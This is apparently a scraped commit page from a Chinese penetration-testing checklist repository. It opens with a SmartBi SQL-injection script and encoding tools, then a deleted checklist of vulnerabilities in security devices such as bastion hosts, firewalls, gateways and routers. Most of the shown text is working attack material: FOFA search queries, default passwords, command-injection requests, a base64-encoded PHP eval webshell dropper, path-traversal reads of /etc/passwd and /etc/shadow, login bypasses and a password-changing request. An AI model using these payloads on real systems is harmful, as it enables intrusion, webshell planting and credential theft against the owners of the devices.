sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh&paramsInfo=%5B%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22name%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22alias%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22value%22%3A%22'11111%22%2C%22displayValue%22%3A%22'11111%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22name%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22alias%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22value%22%3A%22440000%22%2C%22displayValue%22%3A%22%E5%B9%BF%E4%B8%9C%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id%22%2C%22name%22%3A%22id%22%2C%22alias%22%3A%22%E6%A3%80%E6%B5%8B%E6%9C%BA%E6%9E%84id%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%5D&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D
```
#### 0x02 RMIServet加密后注入
报错注入脚本:
```
#coding=utf-8
import requests
from urllib.parse import quote,unquote
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
#去除https的warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
ENCODING_SCHEDULE = {
"0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P",
"%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t",
"D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3",
"O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")",
"Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".",
"k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q",
"v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y",
}
DECODING_SCHEDULE = {
"7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!",
"/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C",
"T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N",
"o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y",
"U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j",
"G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u",
"g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_",
}
#此函数可以用来加密明文也可以解密服务器返回的密文
def encode(code):
out = ""
for item in code:
out = out + ENCODING_SCHEDULE.get(item, item)
return out
def decode(code):
out = ""
for item in code:
out = out + DECODING_SCHEDULE.get(item, item)
return out
url = "https://127.0.0.1/vision/ssreportServlet"
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded",
"Cookie":"JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB"
}
origin1 = '''[{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.单位名称","name":"单位名称","alias":"单位名称","value":"'''
origin2 = '''","displayValue":"'''
origin3 = '''"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所属机构","name":"所属机构","alias":"所属机构","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在省份","name":"所在省份","alias":"所在省份","value":"440000","displayValue":"广东"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在地市","name":"所在地市","alias":"所在地市","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在区县","name":"所在区县","alias":"所在区县","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id","name":"id","alias":"检测机构id","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间起","name":"填报时间起","alias":"填报时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间止","name":"填报时间止","alias":" 填报时间止","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间起","name":"更新时间起","alias":"更新时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间止","name":"更新时间止","alias":"更新时间止","value":"","displayValue":""}]'''
for i in range(1,20):
payload = "%' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {0},1),0x7e)) and null = '%".format(i)
# print(payload)
origin_full = origin1 + payload + origin2 + payload + origin3
# print(origin_full)
url_encode_full = quote(origin_full)
# print(url_encode_full)
rmi_encode = encode(url_encode_full)
# print(rmi_encode)
encode_final = 'encode='+rmi_encode
data = {
"resid":"I40281d81016a8bc28bc20231016aaee007b230ac",
"clientId":"Iff8080810176f0c7f0c7544f0176f54eb72c1160",
"refreshType":"refresh",
"paramsInfoEncode":encode_final
}
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
r = requests.post(url,data=data,headers=headers,verify=False)
#print(r.text)
regex = r"~\w+~"
match = re.search(regex,r.text).span() #返回第一个匹配到的结果的位置1000,1005
database = r.text[match[0]+1:match[1]-1]
print(r.text[match[0]:match[1]])
with open('file.txt','a+') as f:
f.write(database+'\n')
```
## 五、任意文件读取
V85以下的可能任意文件下载都有V95版本不存在。
```
https://127.0.0.1/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx
```
## 附录、RMIServet加解密
SmartBi 有两种传参方式RMIServlet 加密或直接传输。
### 0x01 RMIServlet加密
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 148
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
encode=zDp4Wp4gRip+Q5h(kpzDp4xw4tI(6-p+/JV/uuc'(mKi(Kp719J(~K((~K(((pm719JhNp'uKiMM('9/uu/ut/uuXIw6--Qw1/uu/ut/uu6QSS/uu/ut/uuY!a0bp1uN/uu/utk4Qp/JT
```
### 0x02 直接传输
上述encode加密字段解密后为
```
UserService+updateUserForChange+["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
等同于:
```
className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
构造数据包:
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 148
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
### 0x03 RMIServet加解密脚本
```python
from urllib.parse import unquote
from urllib.parse import quote
ENCODING_SCHEDULE = {
"0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P",
"%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t",
"D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3",
"O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")",
"Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".",
"k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q",
"v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y",
}
DECODING_SCHEDULE = {
"7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!",
"/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C",
"T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N",
"o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y",
"U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j",
"G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u",
"g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_",
}
#此函数可以用来加密明文也可以解密服务器返回的密文
def encode(code):
out = ""
for item in code:
out = out + ENCODING_SCHEDULE.get(item, item)
return out
def decode(code):
out = ""
for item in code:
out = out + DECODING_SCHEDULE.get(item, item)
return out
def read():
with open('read.txt', 'r') as f:
return f.read()
a=read()
b = decode(a)
c = encode(a)
print('Input: ' + a + '\n')
print('decode: ' + b + '\n')
print('decode-unquote-url: '+unquote(b,'utf-8'))
print('encode: '+c)
```
注:加密和解密的过程就是替换字符的过程,最终解密得到的是 url 编码,加密时传入的文本也要是 url 编码。

BIN
CHECKLIST/images/image-20230609142007526.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 138 KiB

BIN
CHECKLIST/images/image-20230609143031183.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 107 KiB

BIN
CHECKLIST/images/image-20230609143105272.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 119 KiB

BIN
CHECKLIST/images/image-20230609155053114.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 107 KiB

BIN
CHECKLIST/images/image-20230609155124566.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 206 KiB

BIN
CHECKLIST/images/image-20230609155215648.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 222 KiB

BIN
CHECKLIST/images/image-20230609161347780.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 52 KiB

BIN
CHECKLIST/images/image-20230609161814152.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 56 KiB

BIN
CHECKLIST/images/image-20230717111349311.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 191 KiB

865
CHECKLIST/安全设备漏洞 Checklist.md
View File

@ -1,865 +0,0 @@
# 安全设备漏洞 Checklist
更新时间2023.06
##### **【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。**
&#x2705; 表示漏洞文档已收录 [Vulnerability-Wiki]( https://github.com/Threekiii/Vulnerability-Wiki) 漏洞库仅收录2022/2023年部分安全设备全部 iot 漏洞列表见 [README.md](https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/iot/README.md)。参考阅读:[ffffffff0x/SecDevice-Exploits](https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/RedTeam/%E5%AE%89%E9%98%B2%E8%AE%BE%E5%A4%87/SecDevice-Exploits.md#%E9%BD%90%E6%B2%BB%E5%A0%A1%E5%9E%92%E6%9C%BA)
## 一、身份与访问控制
### 0x01 堡垒机
#### 齐智堡垒机
FOFA
```
app="齐治科技-堡垒机"
```
##### 默认口令
```
shterm/shterm
```
##### shterm命令执行 tui.update.php
```
POST /shterm/listener/tui_update.php
a=["t';import os;os.popen('whoami')#"]
```
##### 前台命令执行 cluster_manage.php CNVD-2019-20835
访问以下路径,返回 ok
```
http://10.20.10.11/listener/cluster_manage.php
```
写入webshell
```
/var/www/shterm/resources/qrcode/lbj77.php 密码10086
```
```
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
```
##### 后台命令执行 data_provider.php CNVD-2019-17294
```
POST /audit/data_provider.php?ds_y=2019&ds_m=03&ds_d=02&ds_hour=01&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true
Host: your-ip
page=1&rp=30&sortname=stampl&sortorder=desc&query=&qtype=
```
##### 任意用户登录
```
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
#### H3C SecPath
FOFA
```
app="H3C-SecPath-运维审计系统" && body="2018"
```
#### Teleport 堡垒机
FOFA
```
app="TELEPORT堡垒机"
```
##### 任意用户登录
返回 code 为 0 说明成功,刷新首页即可进入后台:
```
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}
```
##### 后台文件读取
```
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&amp;offset=0
```
### 0x02 IMC
#### H3C IMC 智能管理中心
FOFA
```
"/imc/javax.faces.resource/images/login_logo_h3c.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="iMC来宾接入自助管理系统"
```
##### 远程代码执行
```
POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1567
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
```
## 二、网络检测与响应
### 0x01 蜜罐
### 0x02 IDS
#### 绿盟 UTS 综合威胁探针
##### 管理员任意登录
输入 admin/任意密码,点击登录。更改响应包,将 {"status":false,...} 中的 false 改为 true此时响应包将泄露 admin 用户密码的 md5 值。
利用 md5 值登录页面:
```
POST /webapi/v1/authen_user
{"username":"admin","password":md5}
```
### 0x03 防火墙
#### 安恒 明御WEB应用防火墙
FOFA
```
app="安恒信息-明御WAF"
```
##### report.php 任意用户登录✅
漏洞指纹:
```
/report.m?a=rpc-timed
/system.m?a=reserved
```
#### Cisco ASA
```
app="CISCO-ASA-5520"
```
##### 拒绝服务/敏感信息获取 CVE-2018-0296
exp
- https://github.com/yassineaboukir/CVE-2018-0296
- https://github.com/milo2012/CVE-2018-0296
##### 任意文件删除 CVE-2020-3187
exp
- https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
##### 目录穿越/任意文件读取 CVE-2020-3452
漏洞影响
```
Cisco ASA 设备影响版本:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
```
```
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
#### H3C SecPath下一代防火墙
FOFA
```
title="Web user login"
```
##### 任意文件下载 ✅
```
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd
```
```
/webui/?
g=sys_capture_file_download&name=../../../../../../../../etc/passwd
```
#### 奇安信 网康下一代防火墙
FOFA
```
app="网康科技-下一代防火墙"
```
##### 远程命令执行 ✅
```
POST /directdata/direct/router HTTP/1.1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
```
访问:
```
https://x.x.x.x/test_test.txt
```
#### 启明星辰 天清汉马USG防火墙
##### 默认口令
```
useradmin/venus.user
```
#### 佑友防火墙
##### 默认口令
```
admin/hicomadmin
```
##### 后台命令执行
```
系统管理 --> 维护工具 --> Ping
127.0.0.1|cat /etc/passwd
```
#### ZeroShell
FOFA
```
app="Zeroshell-防火墙"
```
##### ZeroShell 3.9.0 cgi-bin/kerbynet 命令执行
exp
- https://www.exploit-db.com/exploits/49096
### 0x04 网关
#### 奇安信 网康 NS-ASG 安全网关
FOFA
```
网康 NS-ASG 安全网关
```
##### 任意文件读取 ✅
```
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
```
#### 安恒 明御安全网关
##### 命令执行/任意文件读取✅
漏洞指纹:
```
/webui/?g=aaa_portal_auth_local_submit&suffix=
/webui/?g=sys_dia_data_down&file_name=
/webui/?g=sys_dia_data_check&file_name=
...
```
#### 锐捷 EG 易网关
##### 管理员账号密码泄露 ✅
获取账号密码:
```
POST /login.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
username=admin&password=admin?show+webmaster+user
```
##### branch_passw.php 远程命令执行 ✅
发送请求包:
```
POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=52222egp72ilkpf2de7qbrigk3;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
pass=|cat /etc/psswd>../test_test.txt
```
再访问:
```
http://your-ip/test_test.txt
```
##### cli.php 远程命令执行 ✅
发送请求包:
```
POST /cli.php?a=shell HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
notdelay=true&command=id
```
##### download.php 任意文件读取 ✅
poc
```
/download.php?a=read_txt&file=../../../../etc/passwd
```
#### 锐捷 ISG 视频接入安全网关
##### 账号密码泄露漏洞 ✅
FOFA
```
title="RG-ISG"
```
F12 查看到账号密码解密md5 后登陆系统。
### 0x05 路由器
#### D-Link DAP-2020
FOFA
```
body="DAP-1360" && body="6.05"
```
##### webproc 任意文件读取 CVE-2021-27250 ✅
poc
```
POST /cgi-bin/webproc
getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
```
#### H3C 企业路由器ER、ERG2、GR系列
##### 任意用户登录漏洞 ✅
攻击者可通过访问 /userLogin.asp/../actionpolicy_status/../xxxx.cfg 接口xxxx 为设备型号(比如设备型号为 ER5200G2即访问 /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg绕过 COOKIE 验证,进行目录穿越,获取设备的明文配置文件。
配置中有明文的 Web 管理员账号 admin 密码,登录后台可通过开启 telnet 获取命令执行权限。
#### iKuai 路由器
FOFA
```
title="登录爱快流控路由"
```
##### 后台任意文件读取✅
默认密码admin/admin
poc
```
GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....
```
##### 流控路由 SQL注入漏洞✅
万能密码登录:
```
user: "or""=""or""="
pass: 空
```
#### 锐捷 NBR路由器
##### 远程命令执行漏洞 CNVD-2021-09650 ✅
FOFA
```
title="锐捷网络-EWEB网管系统"
icon_hash="-692947551"
```
构造命令执行:
```
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
```
再访问:
```
/guest_auth/test.txt
```
### 0x06 负载均衡
#### Citrix ADC
##### 默认口令
```
nsroot/nsroot
```
##### 远程代码执行 CVE-2019-19781
访问以下链接返回403则表示不存在漏洞返回smb.conf则证明漏洞存在。
```
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
```
exp
- https://github.com/trustedsec/cve-2019-19781
- https://github.com/jas502n/CVE-2019-19781
#### F5 BIG-IP
##### 远程代码执行 CVE-2020-5902
exp
- https://github.com/jas502n/CVE-2020-5902
- https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
##### 远程代码执行 CVE-2021-22986
```
POST /mgmt/tm/util/bash HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
